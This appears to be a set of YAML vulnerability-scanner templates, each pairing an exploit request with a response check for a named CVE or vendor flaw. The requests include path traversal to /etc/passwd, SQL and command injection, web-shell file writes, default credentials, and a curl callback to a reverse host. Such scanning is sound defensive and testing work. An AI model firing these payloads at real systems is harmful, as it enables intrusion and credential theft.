{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo '' >/var/www/html/{{r2}}.php"]}],"type":"rpc","tid":17} 9 | expression: | 10 | response.status == 200 && response.body.bcontains(b"SSLVPN_Resource") && response.body.bcontains(b"\"result\":{\"success\":true}") 11 | - method: GET 12 | path: /{{r2}}.php 13 | expression: | 14 | response.status == 200 && response.body.bcontains(bytes(md5(r2))) 15 | detail: 16 | author: YekkoY 17 | description: "网康下一代防火墙_任意命令执行漏洞" 18 | links: 19 | - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/netgear-cve-2017-5521.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-netgear-cve-2017-5521 2 | rules: 3 | - method: POST 4 | path: /passwordrecovered.cgi?id=get_rekt 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && "right\">Router\\s*Admin\\s*Username<".bmatches(response.body) && "right\">Router\\s*Admin\\s*Password<".bmatches(response.body) && response.body.bcontains(b"left") 8 | detail: 9 | author: betta(https://github.com/betta-cyber) 10 | links: 11 | - https://www.cnblogs.com/xiaoxiaoleo/p/6360260.html 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/nextjs-cve-2017-16877.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nextjs-cve-2017-16877 2 | rules: 3 | - method: GET 4 | path: /_next/../../../../../../../../../../etc/passwd 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | version: <2.4.1 10 | author: Loneyer 11 | links: 12 | - https://github.com/Loneyers/vuldocker/tree/master/next.js 13 | - https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/nexus-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nexus-default-password 2 | rules: 3 | - method: GET 4 | path: /service/local/authentication/login 5 | follow_redirects: false 6 | headers: 7 | Accept: application/json 8 | Authorization: Basic YWRtaW46YWRtaW4xMjM= 9 | expression: > 10 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"loggedIn") 11 | detail: 12 | author: Soveless(https://github.com/Soveless) 13 | Affected Version: "Nexus Repository Manager OSS" 14 | links: 15 | - https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3A--installing-and-starting-nexus-repository-manager 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/nexusdb-cve-2020-24571-path-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nexusdb-cve-2020-24571-path-traversal 2 | rules: 3 | - method: GET 4 | path: /../../../../../../../../windows/win.ini 5 | follow_redirects: true 6 | expression: > 7 | response.status == 200 && response.body.bcontains(bytes("[extensions]")) && response.content_type.contains("application/octet-stream") 8 | detail: 9 | author: su(https://suzzz112113.github.io/#blog) 10 | links: 11 | - https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 -------------------------------------------------------------------------------- /src/plugins/pocs/nhttpd-cve-2019-16278.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nhttpd-cve-2019-16278 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: "/.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0" 8 | body: | 9 | echo 10 | echo 11 | expr {{r1}} + {{r2}} 2>&1 12 | expression: > 13 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 14 | 15 | detail: 16 | author: Loneyer 17 | versions: <= 1.9.6 18 | links: 19 | - https://git.sp0re.sh/sp0re/Nhttpd-exploits 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/node-red-dashboard-file-read-cve-2021-3223.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-node-red-dashboard-file-read-cve-2021-3223 2 | rules: 3 | - method: GET 4 | path: /ui_base/js/..%2f..%2f..%2f..%2fsettings.js 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes("Node-RED web server is listening")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password")) 7 | detail: 8 | author: Print1n(http://print1n.top) 9 | links: 10 | - https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/novnc-url-redirection-cve-2021-3654.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-novnc-url-redirection-cve-2021-3654 2 | rules: 3 | - method: GET 4 | path: / 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"noVNC") 8 | - method: GET 9 | path: "//baidu.com/%2f.." 10 | follow_redirects: false 11 | expression: | 12 | response.status == 301 && response.headers["location"] == "//baidu.com/%2f../" 13 | detail: 14 | author: txf(https://github.com/tangxiaofeng7) 15 | links: 16 | - https://seclists.org/oss-sec/2021/q3/188 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/nps-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nps-default-password 2 | rules: 3 | - method: POST 4 | path: /login/verify 5 | body: username=admin&password=123 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"login success") 9 | -------------------------------------------------------------------------------- /src/plugins/pocs/ns-asg-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ns-asg-file-read 2 | rules: 3 | - method: GET 4 | path: "/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"$certfile") && response.body.bcontains(b"application/pdf") 7 | detail: 8 | author: YekkoY 9 | description: "网康 NS-ASG安全网关 任意文件读取漏洞" 10 | links: 11 | - http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md -------------------------------------------------------------------------------- /src/plugins/pocs/nsfocus-uts-password-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nsfocus-uts-password-leak 2 | rules: 3 | - method: GET 4 | path: /webapi/v1/system/accountmanage/account 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"account") && response.body.bcontains(b"password") 8 | detail: 9 | author: MrP01ntSun(https://github.com/MrPointSun) 10 | links: 11 | - https://blog.csdn.net/DFMASTER/article/details/108547352 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/nuuo-file-inclusion.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nuuo-file-inclusion 2 | rules: 3 | - method: GET 4 | path: /css_parser.php?css=css_parser.php 5 | follow_redirects: false 6 | expression: response.status == 200 && response.headers["content-type"] == "text/css" && response.body.bcontains(b"$_GET['css']") 7 | detail: 8 | author: 2357000166(https://github.com/2357000166) 9 | links: 10 | - https://www.exploit-db.com/exploits/40211 -------------------------------------------------------------------------------- /src/plugins/pocs/odoo-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-odoo-file-read 2 | groups: 3 | win: 4 | - method: GET 5 | path: "/base_import/static/c:/windows/win.ini" 6 | expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") 7 | linux: 8 | - method: GET 9 | path: "/base_import/static/etc/passwd" 10 | expression: response.status == 200 && r'root:[x*]:0:0:'.bmatches(response.body) 11 | detail: 12 | author: amos1 13 | links: 14 | - https://quake.360.cn/quake/#/vulDetail/QH-202006-1954/checked 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/openfire-cve-2019-18394-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-openfire-cve-2019-18394-ssrf 2 | rules: 3 | - method: GET 4 | path: /getFavicon?host=baidu.com/? 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("image/x-icon") && response.body.bcontains(bytes("baidu.com")) 8 | detail: 9 | author: su(https://suzzz112113.github.io/#blog) 10 | links: 11 | - https://www.cnvd.org.cn/patchInfo/show/192993 12 | - https://www.cnblogs.com/potatsoSec/p/13437713.html 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/panabit-gateway-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-panabit-gateway-default-password 2 | rules: 3 | - method: POST 4 | path: /login/userverify.cgi 5 | body: username=admin&password=panabit 6 | expression: | 7 | response.status == 200 && response.headers["Set-Cookie"].contains("paonline_admin") && response.body.bcontains(b"URL=/index.htm") 8 | detail: 9 | author: Print1n(https://github.com/Print1n) 10 | links: 11 | - https://max.book118.com/html/2017/0623/117514590.shtm -------------------------------------------------------------------------------- /src/plugins/pocs/panabit-ixcache-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-panabit-ixcache-default-password 2 | rules: 3 | - method: POST 4 | path: /login/userverify.cgi 5 | body: username=admin&password=ixcache 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"URL=/cgi-bin/monitor.cgi") 8 | detail: 9 | author: B1anda0(https://github.com/B1anda0) 10 | links: 11 | - http://forum.panabit.com/thread-10830-1-1.html -------------------------------------------------------------------------------- /src/plugins/pocs/pbootcms-database-file-download.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-pbootcms-database-file-download 2 | rules: 3 | - method: GET 4 | path: /data/pbootcms.db 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && "^SQLite format 3\\x00\\x10".bmatches(response.body) && response.body.bcontains(b"PbootCMS") 8 | detail: 9 | author: abcRosexyz(https://github.com/abcRosexyz) 10 | links: 11 | - https://www.cnblogs.com/0daybug/p/12786036.html 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/php-cgi-cve-2012-1823.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-php-cgi-cve-2012-1823 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: POST 6 | path: /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input 7 | body: 8 | follow_redirects: false 9 | expression: | 10 | response.body.bcontains(bytes(md5(string(rand)))) 11 | detail: 12 | author: 17bdw 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823 -------------------------------------------------------------------------------- /src/plugins/pocs/phpcms-cve-2018-19127.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpcms-cve-2018-19127 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /type.php?template=tag_(){}%3b@unlink(file)%3becho md5($_GET[1])%3b{//../rss 7 | follow_redirects: true 8 | expression: | 9 | response.status == 200 10 | - method: GET 11 | path: /data/cache_template/rss.tpl.php?1={{r}} 12 | follow_redirects: true 13 | expression: | 14 | response.body.bcontains(bytes(md5(string(r)))) 15 | 16 | detail: 17 | author: pa55w0rd(www.pa55w0rd.online/) 18 | Affected Version: "PHPCMS2008" 19 | links: 20 | - https://github.com/ab1gale/phpcms-2008-CVE-2018-19127 21 | -------------------------------------------------------------------------------- /src/plugins/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion 2 | rules: 3 | - method: GET 4 | path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 5 | follow_redirects: false 6 | expression: >- 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | author: p0wd3r 10 | links: 11 | - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/phpmyadmin-setup-deserialization.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpmyadmin-setup-deserialization 2 | rules: 3 | - method: POST 4 | path: /scripts/setup.php 5 | body: >- 6 | action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} 7 | follow_redirects: false 8 | expression: >- 9 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 10 | detail: 11 | author: p0wd3r 12 | links: 13 | - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/phpok-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpok-sqli 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: "/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{r1}}))) --+" 7 | expression: | 8 | response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 9 | detail: 10 | author: jinqi 11 | links: 12 | - https://github.com/jinqi520 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/phpshe-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpshe-sqli 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,CONCAT%28md5({{rand}})%29,4,5,6,7,8,9,10,11,12%23_ 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: hhdaddy 11 | Affected Version: "1.7" 12 | links: 13 | - https://www.cnblogs.com/Spec/p/10718046.html 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/phpstudy-backdoor-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpstudy-backdoor-rce 2 | set: 3 | r: randomLowercase(6) 4 | payload: base64("printf(md5('" + r + "'));") 5 | rules: 6 | - method: GET 7 | path: /index.php 8 | headers: 9 | Accept-Encoding: 'gzip,deflate' 10 | Accept-Charset: '{{payload}}' 11 | follow_redirects: false 12 | expression: | 13 | response.body.bcontains(bytes(md5(r))) 14 | detail: 15 | author: 17bdw 16 | Affected Version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4" 17 | vuln_url: "php_xmlrpc.dll" 18 | links: 19 | - https://www.freebuf.com/column/214946.html -------------------------------------------------------------------------------- /src/plugins/pocs/phpunit-cve-2017-9841-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpunit-cve-2017-9841-rce 2 | set: 3 | rand: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 7 | body: 8 | follow_redirects: false 9 | expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 10 | detail: 11 | author: p0wd3r,buchixifan 12 | links: 13 | - https://github.com/vulhub/vulhub/tree/master/phpunit/CVE-2017-9841 -------------------------------------------------------------------------------- /src/plugins/pocs/prometheus-url-redirection-cve-2021-29622.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-prometheus-url-redirection-cve-2021-29622 2 | rules: 3 | - method: GET 4 | path: /new/newhttps:/baidu.com 5 | follow_redirects: false 6 | expression: | 7 | response.status == 302 && response.headers["location"] == "https:/baidu.com?" 8 | detail: 9 | author: fuzz7j(https://github.com/fuzz7j) 10 | links: 11 | - https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/pulse-cve-2019-11510.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-pulse-cve-2019-11510 2 | rules: 3 | - method: GET 4 | path: >- 5 | /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 9 | detail: 10 | author: leezp 11 | Affected Version: "Pulse Connect Secure: 9.0RX 8.3RX 8.2RX" 12 | links: 13 | - https://github.com/jas502n/CVE-2019-11510-1 14 | - https://github.com/projectzeroindia/CVE-2019-11510 -------------------------------------------------------------------------------- /src/plugins/pocs/qibocms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-qibocms-sqli 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /f/job.php?job=getzone&typeid=zone&fup=..\..\do\js&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1&pre=qb_label%20where%20lid=-1%20UNION%20SELECT%201,2,3,4,5,6,0,md5({{rand}}),9,10,11,12,13,14,15,16,17,18,19%23 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: Rexus 11 | links: 12 | - https://www.ld-fcw.com/ 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/qilin-bastion-host-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-qilin-bastion-host-rce 2 | set: 3 | r2: randomLowercase(10) 4 | rules: 5 | - method: GET 6 | path: /get_luser_by_sshport.php?clientip=1;echo%20"">/opt/freesvr/web/htdocs/freesvr/audit/{{r2}}.php;&clientport=1 7 | follow_redirects: false 8 | expression: response.status == 200 9 | 10 | - method: GET 11 | path: /{{r2}}.php 12 | follow_redirects: false 13 | expression: response.status == 200 && response.body.bcontains(bytes(md5(r2))) 14 | 15 | detail: 16 | author: For3stCo1d (https://github.com/For3stCo1d) 17 | description: "iAudit-fortressaircraft-rce" 18 | links: 19 | - https://yun.scdsjzx.cn/system/notice/detail/399d2dd0-94aa-4914-a8f6-e71f8dc8ac87 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/qizhi-fortressaircraft-unauthorized.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-qizhi-fortressaircraft-unauthorized 2 | rules: 3 | - method: GET 4 | path: >- 5 | /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"错误的id") && response.body.bcontains(b"审计管理员") && response.body.bcontains(b"事件审计") 8 | 9 | detail: 10 | author: we1x4n(https://we1x4n.com/) 11 | links: 12 | - https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/rabbitmq-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-rabbitmq-default-password 2 | rules: 3 | - method: GET 4 | path: /api/whoami 5 | expression: | 6 | response.status == 401 7 | - method: GET 8 | path: /api/whoami 9 | headers: 10 | Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"\"name\":\"guest\"") 13 | detail: 14 | author: mumu0215(https://github.com/mumu0215) 15 | links: 16 | - http://luckyzmj.cn/posts/15dff4d3.html -------------------------------------------------------------------------------- /src/plugins/pocs/rails-cve-2018-3760-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-rails-cve-2018-3760-rce 2 | rules: 3 | - method: GET 4 | path: '/assets/file:%2f%2f/etc/passwd' 5 | follow_redirects: false 6 | expression: | 7 | response.status == 500 && response.body.bcontains(b"FileOutsidePaths") 8 | search: '/etc/passwd is no longer under a load path: (?P.*?),' 9 | - method: GET 10 | path: >- 11 | /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd 12 | follow_redirects: false 13 | expression: | 14 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 15 | detail: 16 | author: leezp 17 | Affected Version: "Sprockets<=3.7.1" 18 | links: 19 | - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/razor-cve-2018-8770.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-razor-cve-2018-8770 2 | rules: 3 | - method: GET 4 | path: /tests/generate.php 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"Fatal error: Class 'PHPUnit_Framework_TestCase' not found in ") && response.body.bcontains(b"/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line") 8 | detail: 9 | author: we1x4n(https://we1x4n.github.io/) 10 | links: 11 | - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770 12 | - https://www.exploit-db.com/exploits/44495/ 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/rconfig-cve-2019-16663.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-rconfig-cve-2019-16663 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | r1: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: GET 7 | path: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bexpr%20{{r}}%20%2B%20{{r1}}%20%20%23 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(string(r + r1))) 10 | detail: 11 | author: 17bdw 12 | links: 13 | - https://github.com/rconfig/rconfig/commit/6ea92aa307e20f0918ebd18be9811e93048d5071 14 | - https://www.cnblogs.com/17bdw/p/11840588.html 15 | - https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ -------------------------------------------------------------------------------- /src/plugins/pocs/resin-cnnvd-200705-315.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-cnnvd-200705-315 2 | rules: 3 | - method: GET 4 | path: /%20../web-inf/ 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"/ ../web-inf/") && response.body.bcontains(b"Directory of /") 8 | detail: 9 | author: whynot(https://github.com/notwhy) 10 | links: 11 | - https://www.secpulse.com/archives/39144.html 12 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315 -------------------------------------------------------------------------------- /src/plugins/pocs/resin-inputfile-fileread-or-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-inputfile-fileread-or-ssrf 2 | rules: 3 | - method: GET 4 | path: /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(bytes("<%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %>")) 8 | detail: 9 | author: whynot(https://github.com/notwhy) 10 | links: 11 | - https://www.secpulse.com/archives/496.html -------------------------------------------------------------------------------- /src/plugins/pocs/resin-viewfile-fileread.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-viewfile-fileread 2 | rules: 3 | - method: GET 4 | path: /resin-doc/viewfile/?file=index.jsp 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(bytes("%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %")) 8 | detail: 9 | author: whynot(https://github.com/notwhy) 10 | links: 11 | - https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205 12 | - http://0day5.com/archives/1173/ -------------------------------------------------------------------------------- /src/plugins/pocs/rockmongo-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-rockmongo-default-password 2 | rules: 3 | - method: POST 4 | path: /index.php?action=login.index&host=0 5 | body: more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3 6 | follow_redirects: false 7 | expression: | 8 | response.status == 302 && response.headers["Location"] == "/index.php?action=admin.index&host=0" 9 | detail: 10 | author: B1anda0(https://github.com/B1anda0) 11 | links: 12 | - https://www.runoob.com/mongodb/working-with-rockmongo.html -------------------------------------------------------------------------------- /src/plugins/pocs/ruijie-eweb-rce-cnvd-2021-09650.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ruijie-eweb-rce-cnvd-2021-09650 2 | set: 3 | r1: randomLowercase(4) 4 | r2: randomLowercase(4) 5 | phpcode: > 6 | "" 7 | payload: base64(phpcode) 8 | rules: 9 | - method: POST 10 | path: /guest_auth/guestIsUp.php 11 | body: | 12 | ip=127.0.0.1|echo '{{payload}}' | base64 -d > {{r2}}.php&mac=00-00 13 | expression: | 14 | response.status == 200 15 | - method: GET 16 | path: /guest_auth/{{r2}}.php 17 | expression: | 18 | response.status == 200 && response.body.bcontains(bytes(r1)) 19 | detail: 20 | author: White(https://github.com/WhiteHSBG) 21 | links: 22 | - https://xz.aliyun.com/t/9016?page=1 23 | - https://www.ruijie.com.cn/gy/xw-aqtg-gw/86747/ 24 | -------------------------------------------------------------------------------- /src/plugins/pocs/ruijie-nbr1300g-cli-password-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ruijie-nbr1300g-cli-password-leak 2 | rules: 3 | - method: POST 4 | path: /WEB_VMS/LEVEL15/ 5 | follow_redirects: false 6 | headers: 7 | Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= 8 | body: | 9 | command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes("webmaster level 2 username guest password guest")) 12 | detail: 13 | author: abbin777 14 | links: 15 | - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/ruijie-uac-cnvd-2021-14536.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ruijie-uac-cnvd-2021-14536 2 | rules: 3 | - method: GET 4 | path: /login.php 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"RG-UAC登录页面") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body) 8 | detail: 9 | author: jweny(https://github.com/jweny) 10 | links: 11 | - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247483972&idx=1&sn=b51678c6206a533330b0279454335065 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/saltstack-cve-2020-16846.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-saltstack-cve-2020-16846 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | 6 | rules: 7 | - method: POST 8 | path: /run 9 | body: token=12312&client=ssh&tgt=*&fun=a&roster=aaa&ssh_priv=aaa|curl+{{reverseURL}}%3b 10 | expression: | 11 | reverse.wait(5) 12 | 13 | detail: 14 | author: we1x4n(https://we1x4n.com/) 15 | links: 16 | - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag 17 | - https://github.com/vulhub/vulhub/blob/master/saltstack/CVE-2020-16846/README.zh-cn.md 18 | -------------------------------------------------------------------------------- /src/plugins/pocs/samsung-wea453e-default-pwd.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-samsung-wea453e-default-pwd 2 | rules: 3 | - method: POST 4 | path: /main.ehp 5 | follow_redirects: false 6 | body: | 7 | httpd;General;lang=en&login_id=root&login_pw=sweap12~ 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes("document.formParent2.changepasswd1.value")) && response.body.bcontains(bytes("passwd_change.ehp")) 10 | detail: 11 | author: sharecast 12 | links: 13 | - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/samsung-wea453e-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-samsung-wea453e-rce 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(1140000, 1144800) 5 | rules: 6 | - method: POST 7 | path: /(download)/tmp/1.txt 8 | follow_redirects: false 9 | body: | 10 | command1=shell%3Aexpr {{r1}} - {{r2}}|dd of=/tmp/1.txt 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) 13 | detail: 14 | author: sharecast 15 | links: 16 | - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/sangfor-ad-download.php-filedownload.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-ad-download.php-filedownload 2 | rules: 3 | - method: GET 4 | path: /report/download.php?pdf=../../../../../etc/hosts 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b'localhost') && response.headers['Content-Disposition'].contains('hosts') 8 | 9 | detail: 10 | author: PeiQi0 11 | links: 12 | - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E6%8A%A5%E8%A1%A8%E7%B3%BB%E7%BB%9F%20download.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md 13 | tags: sangfor,file,download 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/sangfor-ba-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-ba-rce 2 | set: 3 | r1: randomLowercase(8) 4 | rules: 5 | - method: GET 6 | path: /tool/log/c.php?strip_slashes=md5&host={{r1}} 7 | expression: | 8 | response.status == 200 && response.content_type.contains("text/html") && response.body.bcontains(bytes(md5(r1))) 